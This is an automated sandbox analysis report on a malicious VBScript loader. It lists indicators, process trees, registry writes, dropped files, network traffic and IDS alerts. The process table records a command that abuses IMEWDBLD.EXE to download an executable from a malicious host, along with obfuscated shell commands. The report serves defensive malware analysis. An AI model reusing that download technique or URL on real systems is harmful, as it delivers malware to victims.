| File name: | 6742d4234b185e5c6db0a34b173a6c46d5ad9786089f4f09d48b540de88dd7c8.vbs |
| Full analysis: | https://app.any.run/tasks/987c5005-ef7a-4fbd-92fd-c59000738c08 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | April 16, 2024, 16:02:45 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (1006), with no line terminators |
| MD5: | 3D052E45984887167CEE3EA93F0C7D8B |
| SHA1: | 4A108D7B8AE3C463EAF5DABB74408FF7DC816B60 |
| SHA256: | 6742D4234B185E5C6DB0A34B173A6C46D5AD9786089F4F09D48B540DE88DD7C8 |
| SSDEEP: | 24:BVewn54qdptQDuQlJYYKWuQFqhjDiFlLnLW:LHn54qnSJYYTBW |
MALICIOUS
Starts CMD.EXE for self-deleting
- wscript.exe (PID: 6704)
SUSPICIOUS
Starts CMD.EXE for commands execution
- wscript.exe (PID: 6704)
- cmd.exe (PID: 6332)
Runs shell command (SCRIPT)
- wscript.exe (PID: 6704)
Executing commands from a ".bat" file
- wscript.exe (PID: 6704)
- cmd.exe (PID: 6332)
Uses RUNDLL32.EXE to load library
- cmd.exe (PID: 6332)
- rundll32.exe (PID: 6708)
Reads Microsoft Outlook installation path
- rundll32.exe (PID: 6708)
- rundll32.exe (PID: 2364)
Application launched itself
- rundll32.exe (PID: 6708)
- cmd.exe (PID: 6332)
Uses TIMEOUT.EXE to delay execution
- cmd.exe (PID: 6420)
Executable content was dropped or overwritten
- IMEWDBLD.EXE (PID: 5760)
Executes application which crashes
- ofile4162024[1].exe (PID: 2208)
Uses TASKKILL.EXE to kill process
- cmd.exe (PID: 6420)
INFO
Checks proxy server information
- rundll32.exe (PID: 6708)
- rundll32.exe (PID: 2364)
- IMEWDBLD.EXE (PID: 5760)
- WerFault.exe (PID: 2308)
Reads security settings of Internet Explorer
- rundll32.exe (PID: 6708)
- rundll32.exe (PID: 2364)
- IMEWDBLD.EXE (PID: 5760)
Creates files or folders in the user directory
- rundll32.exe (PID: 2364)
- WerFault.exe (PID: 2308)
- IMEWDBLD.EXE (PID: 5760)
Checks supported languages
- ofile4162024[1].exe (PID: 2208)
Drops the executable file immediately after the start
- IMEWDBLD.EXE (PID: 5760)
Create files in a temporary directory
- ofile4162024[1].exe (PID: 2208)
Reads mouse settings
- ofile4162024[1].exe (PID: 2208)
Reads the software policy settings
- WerFault.exe (PID: 2308)
- slui.exe (PID: 3208)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
149
Monitored processes
21
Malicious processes
2
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 792 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2208 | C:\Users\admin\AppData\Local\MiCrOSoft\wIndoWS\iNeTcaChE\IE\RR3E01RZ\ofile4162024[1].exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\ofile4162024[1].exe | conhost.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221225477 Version: 8.9.0.3 Modules
| |||||||||||||||
| 2308 | C:\WINDOWS\SysWOW64\WerFault.exe -u -p 2208 -s 736 | C:\Windows\SysWOW64\WerFault.exe | ofile4162024[1].exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2364 | C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000 | C:\Windows\System32\rundll32.exe | — | rundll32.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2380 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2604 | dEvIcecREdeNTIAldePloYment.ExE | C:\Windows\System32\DeviceCredentialDeployment.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: "DeviceCredentialDeployment.exe" Exit code: 2147942405 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3208 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3320 | TimeoUT /t 7 /noBreAk | C:\Windows\System32\timeout.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5760 | C:\WINDOWS\sYStEm32\ime\SHArEd\ImEwdbld.eXE http://dsaq.shop/sSAniuSX/ofile4162024.exe | C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft IME Open Extended Dictionary Module Exit code: 4294967295 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5964 | C:\WINDOWS\system32\cmd.exe /c DIR C:\Users\admin\AppData\Local\MiCrOSoft\wIndoWS\iNeTcaChE\IE\ /s /B | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
8 523
Read events
8 490
Write events
33
Delete events
0
Modification events
| (PID) Process: | (6704) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (6704) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (6704) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (6704) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (6708) rundll32.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (6708) rundll32.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (6708) rundll32.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (6708) rundll32.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch |
| Operation: | write | Name: | Version |
Value: WS not running | |||
| (PID) Process: | (2364) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (2364) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content |
| Operation: | write | Name: | CacheVersion |
Value: 1 | |||
Executable files
1
Suspicious files
5
Text files
4
Unknown types
5
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2364 | rundll32.exe | C:\Users\admin\AppData\Local\Packages\windows_ie_ac_001\AC\INetCache\MSIMGSIZ.DAT | smt | |
MD5:— | SHA256:— | |||
| 6332 | cmd.exe | C:\Users\admin\AppData\Local\Temp\sK4yW8j1dG9Yxp.baT | text | |
MD5:— | SHA256:— | |||
| 5760 | IMEWDBLD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\ofile4162024[1].exe | executable | |
MD5:— | SHA256:— | |||
| 2208 | ofile4162024[1].exe | C:\Users\admin\AppData\Local\Temp\aut45DB.tmp | binary | |
MD5:— | SHA256:— | |||
| 2208 | ofile4162024[1].exe | C:\Users\admin\AppData\Local\Temp\differences | binary | |
MD5:— | SHA256:— | |||
| 2208 | ofile4162024[1].exe | C:\Users\admin\AppData\Local\Temp\aut45FB.tmp | binary | |
MD5:— | SHA256:— | |||
| 2208 | ofile4162024[1].exe | C:\Users\admin\AppData\Local\Temp\ageless | text | |
MD5:— | SHA256:— | |||
| 2308 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WER4946.tmp.dmp | binary | |
MD5:— | SHA256:— | |||
| 2308 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A12.tmp.WERInternalMetadata.xml | xml | |
MD5:— | SHA256:— | |||
| 2308 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A32.tmp.xml | xml | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
38
DNS requests
17
Threats
2
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1888 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
2312 | svchost.exe | GET | 200 | 23.211.9.92:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
5760 | IMEWDBLD.EXE | GET | 200 | 188.114.96.3:80 | http://dsaq.shop/sSAniuSX/ofile4162024.exe | unknown | — | — | unknown |
6516 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | unknown |
2308 | WerFault.exe | GET | 200 | 23.211.9.92:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
6516 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | unknown |
2980 | svchost.exe | GET | 200 | 23.211.9.92:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.3.crl | unknown | — | — | unknown |
2980 | svchost.exe | GET | 200 | 23.211.9.92:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | — | — | unknown |
2980 | svchost.exe | GET | 200 | 23.211.9.92:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | — | — | unknown |
2980 | svchost.exe | GET | 200 | 23.211.9.92:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4008 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
5152 | MoUsoCoreWorker.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
5760 | IMEWDBLD.EXE | 188.114.96.3:80 | dsaq.shop | CLOUDFLARENET | NL | unknown |
2312 | svchost.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
6204 | RUXIMICS.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
1888 | svchost.exe | 40.126.31.69:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
1888 | svchost.exe | 192.229.221.95:80 | — | EDGECAST | US | whitelisted |
2312 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
client.wns.windows.com |
| whitelisted |
dsaq.shop |
| unknown |
login.live.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
watson.events.data.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
5760 | IMEWDBLD.EXE | A Network Trojan was detected | ET MALWARE Possible Malicious Macro EXE DL AlphaNumL |
5760 | IMEWDBLD.EXE | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |